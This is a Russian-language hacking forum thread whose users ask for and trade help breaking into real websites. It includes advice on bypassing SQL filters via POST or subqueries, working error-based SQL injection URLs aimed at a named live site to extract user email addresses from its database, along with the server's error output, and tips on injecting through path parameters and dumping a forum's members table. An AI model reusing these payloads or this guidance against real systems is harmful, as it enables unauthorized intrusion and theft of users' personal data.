вот нашол на нужном мне сайте phpinfo(). Там есть путь /home/afaserver/local/www/net.21ru.images/public_html//phpinfo.php. Подскажите пожалуйста как я могу войти по этому пути и изменить что нибудь. И что ещё полезного можно вытащить из phpinfo ?
Насколько я помню, там фильтруется последовательность union select from, обходится POST'ом, если скрипт его принимает, либо подзапросы.
попроси админа что бы дал тебе доступ по ssh..и тогда заходи..из пхпинфо слово инфо тебе о чем нибудь говорит? информация тебе поможет если ты нашел скуль и имеешь файл_прив ..либо инклюд..
вот такая проблема: http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20count%28*%29%20from%20user%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29 выдает количество юзеров в таблице user Message: Can't execute query: Duplicate entry '17661' for key 1 но вот при выводе полей пишет ошибку: http://www.uk121.com/events_view.php?eid=%28select+table_name+from+%28select+count%280%20%29,concat%28%28select%20mail%20from%20user+limit+1,1%29,floor%28rand%280%29*2%29%29+from%20+information_schema.tables+group+by+2+limit+1%29a%29 Message: Can't execute query: Unknown column 'table_name' in 'field list' в чем может быть проблема?
Code: http://www.uk121.com/events_view.php?eid=(select*from+(select+name_const((select+mail+from+user+limit+1),1),name_const((select+mail+from+user+limit+1),1))a)
http://xxxx.net/?id=1 при этом запросе не отображает ту страницу которая была при http://xxxx.net/1/ в этом смысле имел ввиду
какой запрос составить чтобы отображало ту же страницу как и при http://xxxx.net/1/ http://xxxx.net/index.php?dir=1 или http://xxxx.net/?pid=1
1) а нам то как узнать? 2) а зачем ты это делаешь? ты скулю расскрутить не можешь при http://xxxx.net/1/ ?
мда уж, для тех кто в танке id=1 равно с /1/ , id=1+union+select+bla bla bla,...../1+union+select+bla bla bla
mysql 5 версия выводимые поля 2 и 3 не выводит не выводит тоже не выводит group_concat, concat пробовал из другой любой кроме ibf_members выводит данные, как обойти?